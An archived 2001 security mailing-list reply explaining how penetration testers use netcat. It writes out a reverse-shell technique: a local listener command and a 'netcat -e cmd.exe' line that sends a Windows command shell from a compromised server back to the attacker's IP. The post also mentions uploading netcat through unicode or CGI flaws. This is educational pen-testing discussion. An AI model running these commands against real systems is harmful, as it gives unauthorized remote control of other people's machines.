Hi Kartik, One use is sending a shell back to yourself. First, uploaded netcat to a remote server, via unicode, vulnerably cgi, or various other methods. Second, On your local computer run netcat in listen mode. $ netcat -l -p 8888 Third, execute netcat on remote server such that it sends a connection back to you. This is assuming that you can execute programs on the remote server. If X is installed on remote server you can send back a xterm or rvxt. Which is a little less complicated. This command may not be 100% correct, I am in a bit of a rush right now, I apologize. netcat -d -e cmd.exe X.X.X.X 8888 (X.X.X.X is your IP) The netcat listener you setup should display something like this: XiXrXsXft XiXdoXs XXXX [Version X.XX.XXXX] (X) CXpXrXgXt 1985-1900 XiXrXsXft CXrX. X:\> This method can vary several ways. Instead of sending a connection back to your local computer, you can also setup a listener on the remote server. Assuming the remote server isn't firewalled. I am also interested in other ways people use netcat in pen testing. Would anyone else care to share? -Forrest Vo0d0o wrote: > I would be grateful if anybody could throw some light on uses of netcat in > pen-testing. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Wed Aug 29 2001 - 11:55:50 PDT